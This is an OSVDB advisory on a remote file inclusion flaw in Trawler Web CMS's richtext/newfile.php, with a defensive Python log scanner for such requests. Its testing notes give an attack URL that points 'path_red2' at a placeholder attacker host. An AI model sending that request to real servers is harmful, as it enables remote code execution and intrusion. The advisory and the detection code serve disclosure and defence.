Trawler Web CMS richtext/newfile.php path_red2 Variable Remote File Inclusion

2006-10-21T12:33:52
ID OSVDB:29967
Type osvdb
Reporter k1tk4t(k1k4t@newhack.org)
Modified 2006-10-21T12:33:52

Description

Vulnerability Description

Trawler Web CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to richtext/newfile.php not properly sanitizing user input supplied to the 'path_red2' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[target]/_msdazu_share/richtext/newfile.php?path_red2=http://[attacker]
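With no patch available, reviewing web server access logs for this request shape is one way to spot attempts. The following is an added example, not part of the original advisory or of Trawler Web CMS; the function name, the common/combined log format and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client, request target and status from a common/combined-format log line.
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# A value that starts with scheme:// (http, https, ftp, ...).
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)
SCRIPT = "/richtext/newfile.php"   # script named in the advisory
PARAM = "path_red2"                # variable named in the advisory


def find_inclusion_attempts(lines):
    """Return (client, status, decoded value) for each flagged request."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        # Case-folded path match: over-report rather than miss.
        if not unquote(url.path).lower().endswith(SCRIPT):
            continue
        # parse_qsl percent-decodes once, as PHP does for query strings.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # PHP variable names are case-sensitive: match the name exactly.
            if name == PARAM and REMOTE_RE.match(value):
                hits.append((client, status, value))
    return hits


# Constructed sample lines (documentation IP ranges, .test hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Oct/2006:12:40:01 +0000] "GET /_msdazu_share/richtext/newfile.php?path_red2=http://remote.test/x.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [21/Oct/2006:12:41:09 +0000] "GET /cms/richtext/newfile.php?id=3&path_red2=ftp%3A%2F%2Fremote.test%2Fx.txt HTTP/1.0" 404 210',
    '198.51.100.7 - - [21/Oct/2006:12:42:30 +0000] "GET /_msdazu_share/richtext/newfile.php?path_red2=../lang HTTP/1.1" 200 1840',
    '198.51.100.8 - - [21/Oct/2006:12:43:02 +0000] "GET /index.php?page=http://remote.test/ HTTP/1.1" 200 930',
    '203.0.113.5 - - [21/Oct/2006:12:44:17 +0000] "GET /_msdazu_share/richtext/newfile.php HTTP/1.1" 200 1840',
]

if __name__ == "__main__":
    for client, status, value in find_inclusion_attempts(SAMPLE_LOG):
        print(f"{client} status={status} {PARAM}={value}")
```

Access logs record only the query string; with register_globals on, the same variable can also be populated from POST data or cookies, which this check does not see.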

References:

Vendor URL: http://harald-kampen.de/cms.htm
Secunia Advisory ID: 22525
Related OSVDB ID: 29964
Related OSVDB ID: 29968
Related OSVDB ID: 29969
Related OSVDB ID: 29965
Related OSVDB ID: 29961
Related OSVDB ID: 29960
Related OSVDB ID: 29962
Related OSVDB ID: 29963
Related OSVDB ID: 29966
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0365.html
Generic Exploit URL: http://milw0rm.com/exploits/2611
CVE-2006-5495